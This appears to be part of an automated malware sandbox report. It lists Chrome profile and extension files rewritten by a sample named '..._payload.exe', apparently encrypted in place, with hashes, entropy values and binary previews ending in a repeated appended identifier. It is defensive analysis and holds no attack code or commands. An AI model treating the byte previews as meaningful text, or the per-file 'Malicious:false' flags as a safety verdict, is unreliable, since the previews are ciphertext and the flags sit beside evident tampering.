                                                                                                                                                                      Preview:....ha85.C..i!K.`.[...0..I..BV.....Z~....l<.....K.Z...s..&w../.'a.V......S.y..c..Y....+)k.8..W.....2........j.RO.R..k0:..:...b.D...|.6}..>.V.w.W.a`.R/...H...?....4.D..e.. .ma..=."{....r... .R...Ep<N.!.3Y..O.6.*B.6.v.t..x.^..v.r9#-.y.c...gZ..k.....|.sp.k[(..B ..|.%/@..p...bb..BF(nL.3n...`.....9...l%...'..~...OU.[tD_....Cfw..s..ZE..w(..lXQ..g..u_....S...Y..04.....4.AJyo....iB...Wt/Vz..g......f.....p.k..=Fd..FW....yN'. L.+I.$.I.....2UD...HS[....]NS..6.:.n.4@....A...=.-..r.:.MI...6{..J...4.k;4..,.. &.:~dU3...r.N.x.dG(.....P)...^s.....Sf/....>9ppA...&.[.Y+QO..9Q..oi'....3...s./cK..Q.z1..W..t...e.....,.E..B...q.?j.<.../.6...O?..@5K..Rv.h..J..k...<E.I.09~....n.Z... M....Y9.v.5@..,...m....c.E...P....q...'..2.g^.*..KS.$.....AS....^.k$.R.^>.<....y..&` .....,!.....)?..."......[).......,.;.+hM...xE....x..PJ1|...2K.1~.1...w..!O7..a....&....M.t9...AC..%.R&7s<.1...#.).0O...Oyn...G...@$u..rM....h_..U....8.+...q..;...T..]..3..l.N+e...{.....t`0B......+\I.

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):486
                                                                                                                                                                      Entropy (8bit):7.551179229151382
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qW7KSqE3mLnRkdMF1YanUVrvzsx7nQGboW/FkUtNbh3rzSUdNcii9a:3O1LnRcMFsxY9QGJyk9lr+2bD
                                                                                                                                                                      MD5:2ACE367D79D2F6D2CAEE99F6F67A1C39
                                                                                                                                                                      SHA1:A8690BF6E4D5CD5A8156D8E6D1B24FC01DF65C4F
                                                                                                                                                                      SHA-256:8113DBC3352CFB93200253A18E089F71678F04392A79820BDC89D13515C6872A
                                                                                                                                                                      SHA-512:608CF517DAF3B20494441B6C22D32311EABF6C9E5B4F1B9A8EDB5A9942255B3E0CEE0B6948EB7FA6B79F44073ABEC2A75A3DB0C9849DFF5B8E1EC5901A9B3109
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.f.5...........n...or.s.`..3..]1cX..U]H.06UR.............M..J..%'...`.<.96wl..Yhs..Y.VU.F.#.KE..*....tX......F4....0..;...^.&P..~..Nn.R..jI....:!.;...C..-S....,.....US..GTw.,.<....U<F.e.B%$.0.+~...v....H.E1.....1. ....F...H22;..X.v$..ve..L..9.00...(i....h.{....;#*.........t.E..aU..J.T......vI.a..i...w.......e2.]....jo..N.6.o.&C...#..<......}....a..Z.......'x..V|.....1..4k:!...\O..[u..BjmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):486
                                                                                                                                                                      Entropy (8bit):7.54878946672771
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qM0ZQrY8yFcRFpqakcP3dEa6AyHhqAqZFVJ2eefvzSUdNcii9a:twQM8yFk993SadyBjq/X2e+W2bD
                                                                                                                                                                      MD5:44CBED9D605062D87DD7E54A0415406C
                                                                                                                                                                      SHA1:2DFE436623EDE90A07E80FB89512192C674271A1
                                                                                                                                                                      SHA-256:67F11D592505E85C74B0076FDA7B01880164BA1818B85DFDB4CAAB092CD37B7C
                                                                                                                                                                      SHA-512:C42A5670DC9FF17C0254DBB00C1AB12713D7B574D401BA36A086EB5BEF8EF60F985AC08E3D6A3F540CB941D508E7B8F98E0714ECE8A178B313EDBFEB1FC1A6E3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.f.5............@zd...).cA.I..9...]...y.M.Y.c...7..^.Ab.}..y..|..F.B.._w.!....O<.....T..D.4...>3.P...=7......../s;.m...km..,...j...`-...c..tq..QO...a.TN.:).."...'.u2..5...3...r...~..>.r.QH.=...V...K.7.m..P.........X.E@..^.:mu.~..B|#....l.DuS.E.n|.I.lt...4|E.2.._O....8..I...g..G....%#m.N.@.....F.P/.J..AX...+.].I..........3...y.hW....D.<..?....'...l5..$..........;....m...H....1.J(.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):790
                                                                                                                                                                      Entropy (8bit):7.724812170238916
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qlEr2ma8ItsYlyyUiMf65VnzEcsdnkFQDgcfGHWhpPsnqrO8bSrQGaOSUdNcii9a:w0nz65VnzEndnkQUcfG2hqnAbSrQB2bD
                                                                                                                                                                      MD5:DEE143644F0DFD07F6297C4DC254DB20
                                                                                                                                                                      SHA1:8E799FFBADECF8617E537E407C0AE8C79DC656B2
                                                                                                                                                                      SHA-256:98B55A9868EA146C3B095623EBF7053B07FEA39684852D68F6828A63C76E526E
                                                                                                                                                                      SHA-512:E4491EBD32431A55A9DFC68D0AFF7EBA9D8F4B3B59AEA38DD816D97C4E0DCA036C484A0A3526C21F583B0B5D20BEAD906B1734D2BFF0CD70E4D7E55C1FEF7E4D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.f.5..%.%Z.s..........$p&Rv......:...$u.Y..,.<# .F.k^{....g..6D.=......|An.......k9...Y...b.=.|uO..q.z.J...i)2r>...v.b./.R..;9..........++S`8@...@.j..H.......kDG..O...k(1...2.4...C._..d.S'.$.5v.>.kG..P....M...gD..7.j.c...2.d...d....d3@u..=Th^]..b...BB...y....}6VMvz......'.......|h..d...........6SS.9.O.."/.......<Y..Q...QU3}...Ryk@...MvF.._.I...K2Tj....|......}T.&(V$C....q{.a.k*.7.$p.mj..$&...._.9..m......~.P8....... ..Q/.......Lc'...G....x..+.gA>..%.Dy.3..i.|.(...........;8:._......E.w..X...]^j...LI.....WUh...cE#.*{..DV.....b+.@;.{96..fz=.8....^..L.6...a Q...e..x.:v,Y.cE."....C.....n...).m9.*n...f...(....s=V."..........0d.C.Y...X...TEs...; V.^....x..AD..R...U..5mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):654
                                                                                                                                                                      Entropy (8bit):7.6571878485355205
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kdFyNyjjdCBjqcQ5dhpJtnxMctRZMQYKZ05SankrOhHPT0qv5SUdNcii9a:4ZIjEPhMc1jYb5SxihH77vM2bD
                                                                                                                                                                      MD5:146E9C23D61E3373FA943E2680BEE17D
                                                                                                                                                                      SHA1:920949B974D317CE5F33C65CC9066DB1C2652363
                                                                                                                                                                      SHA-256:A381CDA0185252C01ECE6ABA6B90A612CD22508EF2BA9BC4290AE94E5B3B0946
                                                                                                                                                                      SHA-512:E045A532A7DF601356ABFD13DB01B2DB98644E7B7AA81570486A08DEF9D67147D9731FB7B804ED035C5B87FB5E1C3827BA310C275AA923138BD034454513E6D1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/....0.^.$....+.0[(........L.I'...-..*.%^.+..;..].Mb....7.=..Kv.n.I..t......,w...:.H.o..m......UK.=d.7.4....Y._...~s.......p..$...V..1`.^k. .w.Q..../....k.D..L.C.C.7.C ..r......~).B`|...wLW.cll..9.S7.%...4..*..r.....X;.k.K.....M..%...8...<<.\..A`..!.]R.uI.Z..tjh{..6..h.......1l.YX..[c.DY...........o.'.dV.j...l....s`h...._5....Ezko..J._ ...6Hc.X5.i..rZ)+.u.zm.P...7I..3h.5.'..%T...........S.`..t..p.n.M2..uMj....3r._.E......]...v<.jM...g.yx...5h........T.x.G.bl.q..@bV.k...Pk......!u.IU.]..!.gM"....fi*^U..>.......{~..)..-b2....t...Ih~.uw.B.].mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                      Entropy (8bit):7.826375086378659
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YHHEP3bRh6vlQn6yymOkxc9fDFYdlAThoweobonLsT/2yDFk2bD:EEPvcm5Nxc9fDS2ThowTz2y9D
                                                                                                                                                                      MD5:836DD107A0C976477F58F328D9B46870
                                                                                                                                                                      SHA1:5CB0B9AD6B6099F5E07551C36E53557CA63D4790
                                                                                                                                                                      SHA-256:57D976837B0E26C84AB3D7DF6C3A942D18F31912836B6A008AF77E771590758B
                                                                                                                                                                      SHA-512:7F4EACB82C06A396F2AADF13B172B447A7829EF866542C55BA272A3EE1E047CB200F1D6D76DF477A9B82876474EC8ACB3BC27A7B20897F89B5D2BF785AB5E683
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. ..u..f....r. H._8...i..aZ..].=4...e.C.n3...e...O..].'.P.Od..A)....^k,KV..Q..1J..b.....C.G<!....=.}....uc....g.C...U..........r..k.@.T.T6p<y.?.,..=....P..h..j.=Y0.8W .d..;.W.>.>.O...}....4..,l.E.*..wm..3...o.r3.=s.$.D>.F........ID...P..W..SV.h..`.M.5B...m.*..+`....{.:.................n...;.>2mC.G.f..lF.o....-0.4{..xvH.._.D...$B..PEs.C_..u.../8.e.7jqN....*.K....>.G;.J.u.H..n>.?h...OG....E!..uQ.l..q...7.k.....2.U3.@...6.4.uaK......0..*.:..,u....~.....6.K4.xD....9./.x..x:..8.s*~.GTL.7^...nT<..Va..]..m.CO.....eB4.."&*.P.......5..T....<.@...TZQ &..@.o..).....a7.d....l.uv..Kq..l..j.@...).HD|......I...,YT.z.&... ...ii.rX.[.*.A.P.....3.$..i..4..........y.g....N..........Ji....q...g....o.t,L.[....Vt...H......I../.?y...Xm..\D./...f.!...^ZAt*..].T.>.Fu6..j..Oy.q...n(..t...\.-..n....n.#...E..|....Mb.C....?......e.....f[YE.U..!d.h.S.A.e...2~K.m.F.~...8..4|..u..M&..e...%X@#b.$.....T6...rmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):965
                                                                                                                                                                      Entropy (8bit):7.817567575377222
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:eQ6Q9uTOQBft1hGKCLuLaekWXJesx2StOP2bD:oO+F1dVXJtVt1D
                                                                                                                                                                      MD5:707ED4E88D1FC5D0B60045CA26634829
                                                                                                                                                                      SHA1:5DF6006326ED991BFFFCCB82AE33CDA1E19FD09D
                                                                                                                                                                      SHA-256:7534E0D9F5BBDCC05CED20FEDEB261E0CB77BC07718166D4F43F22DABCBDBD80
                                                                                                                                                                      SHA-512:B943C95A4F7D3A567020D178D9ECD504370C6C0167684816021F7AFE4874B93D42F6ED02DBC7F6E5B67213A8D2BE0238D8698607900D75E92A2C84405BCE72FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. ..b..o)..h|.N.r.:.T9..j....0...&._Z....Rh..B.XHkzAmA.0.x.......|s..|V.KA..A...Q.[h.....:......].(..{.d._\7.+.Z....1.8"#..R..4q......N.......o.[LZA.ob.U.B..).=......Q.$. ..i6..i8y...<h.....RW,...;........0...d..bp.....a.l).9.u...?..G.1.d.'.ixS....?\..h`.K.E`..b..].i.y..x.....).Qf.@.J....7J:_h5..H...G.5. .....)..0.a.....r..,..c..2f.G&......8..Q..... F.s&.R..5..<...r.Ai..4...)d.V...."}..O=..../.S.,..T....;.}........R.b..:.j.w..p.i...?...~.j.yI.H4.....I.CH..!.xM`..g...]7..&.~.....2..h...v.z...I...x.K..:.}.h+....B....w..r$...e......9q&%.. V~_..m......q...cX.x.8c.`.`..lf..S......J...|..nG.^...L1.Wtw3.|IP..S.1.........-.... ...X^}5..k....F.......(...&..."rW....U.e].CGP.......T.I.e.0..n..HJ..XF$X{~.C.u.........a.E.&..ww..20..Y9.....%U.I.|.nk......O.l8.$..nsn.f.g..*....(.0.zT.^...{(....<......x.V..q.o@...@6..O.t.:..M....[7...@1d{y8=d.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):999
                                                                                                                                                                      Entropy (8bit):7.783826701441902
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:7jy+S9d7Qi/SwRoRBPZjOCSt0zIn1pwsKgOyN0OJH6h2bD:7jy+SXQpeo1OCSQIn1jN0+HDD
                                                                                                                                                                      MD5:3780E2A28F776D34CFC060A5225D81B2
                                                                                                                                                                      SHA1:5E9B4CCAEE8641497DC5568FE3E039DB07E4723B
                                                                                                                                                                      SHA-256:09003533BD9BDF4D08F607F070D8440C8E479CCDB2C1DC3B317C285D9B38EE48
                                                                                                                                                                      SHA-512:187ABA01A1E8AB3EDCFA6A196F6D924659416E59F51E48C00573518E8C69831451EA850CDBE8B13D65B0EA4E1B573FF0DB469622D47CD5805C88CEEA5FE111F8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. ....V7hI.=4..c:W.b..8..#h....c.*T(Z.o.%..Fp....T......e.....H.Vc.l.Z.}...K..<...)e+.].....u....w1....?Y....2..H....x...........P.n(M.q.....q....cB..0..N...t.......`..v..)H.j@to../2We|.~.....Cg.z ..{..".m...)_bg......@]EM(6N){".I...c..l3....@.7'........g.hY.K..C..-!/.7..&..DB.o....2...*...QdE..V.e....|..H.....o...G..?.D......wf.Yh(M..6.F..`.OY......0G.|....q.n.g....e...py..q.4a.FE..G*.*(.....P..E...>:.J..m..d(.H...pfQl...D..Rrv.)e....].......9....US; a.|z....OOz .......$.*.S.f.D....G[8|.W.{.....o.P8.......Y...5...m...I$...:Y.Y=..!....."c.|.. ..^Lg.1...Kfa]pB%...h|..*..IS..&&.N.v..uHjM..{....I.0cU..:.....tC.....}..i`zizEX.K....8H.Z.,.z.%....>dbC.,4.i8.o..3....A..Y."..P1:T....XDc3zu.._.a..5.........G:..w..Y..!.@.M.6C...X.X.2B.........R.X.].~....8..,....S..c8D[...T.d.s4.....j..B......@$..`.Bt.+....W.~.9B......A.?..u.....}...7...[6`.n.7.U...E..5.'[./....K:..G..{...0s..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1005
                                                                                                                                                                      Entropy (8bit):7.775947936456462
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:kRsT8NYK9mvfc8sJtqnVnACyRzTfKUPSxvCs1Ss/2bD:kRnmvkdfqPyRffZSxn13cD
                                                                                                                                                                      MD5:263B741F31391CCC4EA8A4CA9E06FC59
                                                                                                                                                                      SHA1:57A4A705065964121101509E00D9BA335F92589F
                                                                                                                                                                      SHA-256:4566EADA65E38535A8D7A1EFBC11F01208A9EB44F4737A61696024E0033428D8
                                                                                                                                                                      SHA-512:713DFFC6E869F559E8B51FBFAFAF7822D303B94B7CBAF62759BA2940275C60B2ADDC89CAFE946BFF2F3141491BD186A1361EB16563358AA97C669ADA6FFAEEF9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. 7.....L.......{......px..(...{BrS.~\f5<F..tT....mQ...1.a\..'.........-.k..........-;.`C5:....E.h..-.A.a......7RQ..1:NEm,..Ed.B..P"....$&..?..~E..;..5XU.m.?.;.j........9.Yw....>~j.t/.M.m.!.R...Rk..[_R.(.oz..0...g..f..a&^S.|..y...2...6...OY.2..u.v...F.=^W].5..n.....G....S..p..){.V...bQ_.CQ}3W....2X.....i../).%.OhQ.w.i*R..*....6p..../oH.8...Q,$}G.*..j.9..b"...A....*b.......9%tC.@..@i..T.n....<:=.}..[lV..o....tCb...$.PE.0..>mB...7......."..AY<(.}.D.V..7........d..C...U>.{U...i..-..Ci.!.0..b..O.}......6..:......O..1.~...g.......G.9%.....g.XZ:....D_}!Z.M..(~<..p.......Gg.^g[.W.\5GLW...v.f.8...5.'.&<izh...E.[.[.t,t=..+.:(J8.8....$.......q.Uf...........%..K...]...q....)..w..E.+~...i1.O.......JH.N..-.=...ZpM..[>.....E..n.......;9"..;j]......oN./I.z..4.-.,o.Tu....}...Jv..l.f.V.R..{.iv.1..U.C..L.x.9q.-...Vt..7u.!..lD.N....m.v...~..F..+t.C~V&..4..FZ.....*. .=.{......K.+..y1mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):958
                                                                                                                                                                      Entropy (8bit):7.741820443216603
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:5a/D1ZK8wcaO8ISLfyhK1kOYxcZpOB8AXWo2bD:w/hScN/Sr+j40lXWbD
                                                                                                                                                                      MD5:FD651DAF404187B83A091523E8AE4E9D
                                                                                                                                                                      SHA1:76D9E086CF5D2DEFE5A32723EA4232026AB2767D
                                                                                                                                                                      SHA-256:867757EE4BD86165C3295063BEA73A39111BA4288FADFA88F139104A94BC7E2A
                                                                                                                                                                      SHA-512:8916E1891991C59B983527BD1DFF1365DC61BED8C930213447B5BABF99F9FFAEDE0C6DAE4BD9E1DF4DFDDF4330D741A44EA8C024E4338199E973FCAC8BC63454
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. ...9....'..C.n#.2w..].>b.....s..;"..b.Y..a.uteD.{...S.n?`..l.v:.6Y.Z..x=...P.W...Y.U.....,.t.3..S...>l#`~n,....wkW.z7....o.hM...d...Z....)...W/.b.?p.....@.RO/"..L...3...^d.Z;A&...Kd.....m7+.!M......f....(1..!.FO$>..du.p.v...]........$..h..E..F2...X..<...r.....r|.P../.G..;..\...K.jE..bd.M)..-.>rU)U.=m[..:C.L.=I.a.>#W.._f..C.@f..10....!!......;MX..N...m.-..7#J a...PwC:..Bn..g.....|^...x.+r#...)^....t.."....}...k6K.I0E..k.V....Wo.._.C&.o.8.4[./j..|'.G.......Q....;.dx...#...0[Cn8.d......e..Y.\...ov@H........I..r'.h....U..|D...{.<U..7..(KwnP..)}...c..vI'./...~...N....:..s.O.. .....A.r.dg...{U..$....E..........mk.sG.[.uz.YFG.*.|.X....._:.%.(....`....rw....N..$.k.....&.<..>..5@.E.....U...6. ...w....A.6..k.q..g/5.E.']..%c.j....2{.l..UU@\O.(..\..aZE<#.n.)...=?_..<.[....w.".....jD.8.GC...Wy4EI.f....;(..P.>.o.(].......#.G.r1.`B=.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):949
                                                                                                                                                                      Entropy (8bit):7.776483902541087
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TIL3pxWiAGUyoP3BLPnVeMU4pa0ZP42bD:8tdAGU5BBrtpaSPrD
                                                                                                                                                                      MD5:80D6D096F88B20834CD194B97B4CC3B5
                                                                                                                                                                      SHA1:BD290789DF7FE4C5A38FBC6081F78D3236174EDB
                                                                                                                                                                      SHA-256:5AF1F63CB7867280DD3CB3651B2B2AABC5D9BD297DCEC681BD437E13A7E4DA44
                                                                                                                                                                      SHA-512:A6ABF83B266E8C55FD80DD37F370773A64940A49C12D31B0BDD1F572727C4BB255DE5D00FD4FCABF2944BA32BE99862355FF6F82B54C5891F0B34318232CEEC8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. d.....[s..vg..8....WQ...........UX.w...)R......q..1Wt...._K.....r...$,...]..n...3qz.Bt..kt>...^...[{.$V..(jx+`.0t.i3..].........t..fq....k)...l.ppj..$.....{...>...>!g!..|K....U.l.{.wF.....Du..R..z.....-..u`}.......[..!m...E...J.H.x.>...\.S6........uz.$9X&...%..&.R_...=7...x$..=.z}P..e#g.=.1+.........r`A.^...b.k..B?......w....~WX.#..G2.9U#2......Y9*B......!..w.9BC5..e.7{UB.9)....1\...v......u..H._.....7..$.]aS..G..f.. ,..?(.P.\.Ybt..L.G0Di...c...t.1.2.f.@l"....Q.......3.F.N).p...@B.x.?.....F.m...55j.......,. H.R...n|.j%* ...h..x...x.3...3..|\7..\..':.e..C..c..*.K.....lFR......u..5...;.G.,..;.Z.l.".D.}.v..N......}.....3.M........ ..!..\.(.6C.R..1...i?....d<.?.../.$..7..r..N.'y}.../h...N.%.K..S!..6z.]....%uF2...C./.iKv)...m@.O..&..S){......B.Z~....90@.#._.....B......:...J2v^g@..........VD....0..X..O%..U.A..?l..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):970
                                                                                                                                                                      Entropy (8bit):7.8077514375339465
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:viIaK5U9w11O0Aefcc4VAa6cpcVQcBItL/PqdPN+y5qV2bD:HOw7O88iaVpMQAyL3IwErD
                                                                                                                                                                      MD5:75222459D7D5DE9AE290F73F666F08F5
                                                                                                                                                                      SHA1:0C2BDC156856C156B7063B7A74909A20CECF3121
                                                                                                                                                                      SHA-256:B050ED59D2EFF2AF03B79B8B527044A4E6C3374BA0B97158B3BCCD8B3CE57B42
                                                                                                                                                                      SHA-512:74DAFA5E10369413A324A946F6111A0E459FB5E06BA6BBFA4D5ACCCBBCBBE220072C69637851D6C53B989DA5CC3241880A38F15732DF6BE160C6E90EF54E09BF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. Z.+..C...n..h..Cg_.......`.......)?#jK.(Fp0..]@..7..8..Zi..o..E...$.L.\...Z.....It._;....,........Y.x.E.m}.k.:..c.COE....ie..b..'HO.......@.V..e...rC.k..Xv,..?..^..."S.....sD......>....w#.0...1.....[..A+......=.n....%......t..7K.`......Z.Z.n..b.....z>.&.%=...G.hJ............<7...)\....b.u...C^.d..LN3Z.....@...|.c+.t../..9....;r.4.....m...3m2.4..-..g.rF.m..4..#0.B.j.2..-..Mb.ZrK....]k0..h.(..N..D..$.s...j..f<5.`....3..&.l.T.8.%Rf...7..t.U.}.....C..e..f..hs.]R(.T'~.tB..N.%}zJ{.c....=fh....._...aw..C.l.....F.*...2?.........1.Q...#&..ph.v"R..5.)2..V;....@..U.UA.s.C.xU....8....s..C!'3./ug.G..V...g.*.....s.%.Cq..|.C...W.?.y..yj.!I.dp.w.<Kq.s...A........V.=.(....V..2...9]i......t....u.}.,.!.3$e.,..=......|....IJ.@.p.$1a]...rs......Q........7...&vX....n(.b".....=&V..].Q9.3.+.f... l..B6.......k..."..EU]....#>..U{....}.u.CL2..x.&F.X.,..].mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):970
                                                                                                                                                                      Entropy (8bit):7.8007052550447815
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TL1aJnxIkjogwa8h4AHXWw+gJbwiuvUsh2bD:inxtjoUJA3Wwl1fuv16D
                                                                                                                                                                      MD5:B6BB6468DE06EB9511C49D6C8381BAF3
                                                                                                                                                                      SHA1:1B77245B9AE51CDDDD984D8D0A56A7B1BB7B5811
                                                                                                                                                                      SHA-256:70EABBF28738A3E9056B6D6A5B8C3B6C6B553172FF1BEAFFA827B9A85F90CE79
                                                                                                                                                                      SHA-512:386DF62176D50223B9255B89451A0BCE79DA4C3BF382C5E6FDAD0CB4E2BA029AA0D70F3E9B38CACD174C5CA621DC2D7D6B2FB9A4FE41E3520C80924C2E9FFFFA
                                                                                                                                                                      Malicious:false
